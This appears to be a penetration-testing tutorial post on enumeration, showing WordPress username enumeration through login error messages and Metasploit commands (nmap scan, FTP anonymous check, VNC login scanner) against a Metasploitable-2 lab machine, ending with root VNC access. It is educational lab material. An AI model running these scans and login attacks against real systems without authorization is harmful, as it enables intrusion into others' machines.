What is Enumeration?
Enumeration is the process of directly connecting to the victim and trying to get information about the target, In most case enumeration, is used to find username or password of the target. Enumeration can be used to get username/groups, Hostname, Network Services, IP tables and so on. If you are in the Cybersecurity field you will use this term often, below the picture show basic example on how to enumerate the username.
Basic Example OF Enumeration.
In this picture, you can see the WordPress login page running on my local server. If I enter username and password 123456 and in the second picture I entered the username admin and password 123456 both the time I got the different error one for the wrong username or password and other is the wrong password When I entered the username 123456 it shows wrong username or password which means username is wrong but when I entered the username admin it shows the wrong password and confirm that our username is correct. This is how you manually enumerate the username.
In this tutorial, we will look at how to enumerate with the help of Metasploit. Metasploit is one of the most famous penetration testing frameworks, To demonstrate this tutorial I am using Kali Linux as an attacker machine and metasploitable-2 Linux machine as a target which is a vulnerable machine.
Open your Kali Linux terminal and type msfconsole and create a different workspace in Metasploit with
workspace -a metasploit_Linux
This will create a workspace in simple term workspace is like a different directory for your different attack if you are attacking two different machines you can separate your Metasploit work for two different machines. you can choose the name you want.
Now after creating the workspace, we need to identify the IP address of our target in this case target is in the local network you can use netdiscover command but if the target is on the internet you need to find it through various footprinting techniques.
netdicover -r 192.168.197.0/24
Now we have the IP address of our target which is 192.168.197.130, First thing we will do is to scan the IP address for open ports and services, To do that type the following command in your Metasploit workspace
db_nmap -p- -T4 -O -Pn -sV 192.168.197.130
Nmap will start scanning the IP address for services and ports and display it on the terminal, as I said this is a vulnerable machine for the hacking practice you can see that there are soo many ports open and services running,
Now as an ethical hacker you can’t completely rely on tools or only one tool because it can’t give to 100% right result every time you should check it manually or with other tools too and still can find anything that mean there is nothing as in this tutorial I am only showing with Metasploit but you can use other tools too with this to confirm the result.
For this tutorial, I will show you enumeration with some ports and services only but in real life scenario, you should try to enumerate all the open ports.
You can see in the result that port 21 FTP is open and try to enumerate, Now if you enter
use auxiliary/scanner/ftp/ and press Tab key two times in your keyboard it will display all the options available to enumerate the FTP. You can use all of them one by one to know what they do but for this turorial, I am using anonymous option to check FTP allow anonymous login
to do that type the following command in your Metasploit workspace
Now there is a trick in this command with setg RHOST normally we use set RHOST but when you create a different workspace g option save you time which means you don’t have to enter the target IP address again and again with different exploit or payload, it saves the IP address for this workspace.
use auxiliary/scanner/ftp/anonymous setg RHOST 192.168.197.130 SET RPORT 21 Exploit
Now After exploit, it shows that Anonymous Read is available with the version of FTP, To connect with the target through FTP open new terminal and type the following command (use name = Anonymous and don’t enter the password)
ftp 192.168.197.130 Anonymous
In the Port scanning, you can see the VNC is also running on the target system and we will try to enumerate it. We will again use the same process to check all the options available to enumerate the VNC with double Tab keypress. It will display soo many options but we will use vnc login, again you can try all of them from your end to practice and know it better. try the following command
use auxiliary/scanner/vnc/vnc_login setg RHOST 192.168.197.130 SET RPORT 5900 exploit
when you hit enter you can see the Username and password for the VNC server and you can use it to get the remote connecting. To Connect to the Vnc server open the new terminal and type the following command in your terminal (password= password)
You can see that I got the vnc access and with whoami command, I can see that I have root privilege. You can use the same command (use auxiliary/scanner) to see other options available to enumerate the target with other ports and services like HTTP MySQL etc.